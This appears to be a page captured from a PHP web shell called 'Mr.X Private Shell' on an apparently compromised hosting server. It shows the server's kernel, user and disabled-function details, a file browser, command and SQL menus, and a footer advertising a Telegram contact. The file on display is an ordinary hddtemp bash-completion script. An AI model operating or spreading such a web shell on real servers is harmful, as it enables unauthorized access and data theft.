Uname: Linux server.digisquadtech.com 4.18.0-553.100.1.el8_10.x86_64 #1 SMP Mon Feb 2 04:13:33 EST 2026 x86_64
User: 1091 (madhavfluid)
Group: 1090 (madhavfluid)
Disabled functions: NONE
Safe mode: On[ PHPinfo ]
//usr///share/bash-completion/completions      ( Reset | Go to )
File Name: hddtemp
# hddtemp(8) completion                                    -*- shell-script -*-

_hddtemp()
{
    local cur prev words cword split
    _init_completion -s || return

    case $prev in
        -f|--file)
            _filedir db
            return
            ;;
        -l|--listen)
            _ip_addresses
            return
            ;;
        -u|--unit)
            COMPREPLY=( $( compgen -W 'C F' -- "$cur" ) )
            return
            ;;
        -p|--port|-s|--separator|-S|--syslog|-v|--version|-h|-\?|--help)
            return
            ;;
    esac

    $split && return

    if [[ $cur == -* ]]; then
        COMPREPLY=( $( compgen -W '$( _parse_help "$1" ) --help' -- "$cur" ) )
        [[ $COMPREPLY == *= ]] && compopt -o nospace
    else
        cur=${cur:=/dev/}
        _filedir
    fi
} &&
complete -F _hddtemp hddtemp

# ex: filetype=sh

All system for education purposes only. For more tools: Telegram @jackleet

Mr.X Private Shell

Logo
-
New File | New Folder
Command
SQL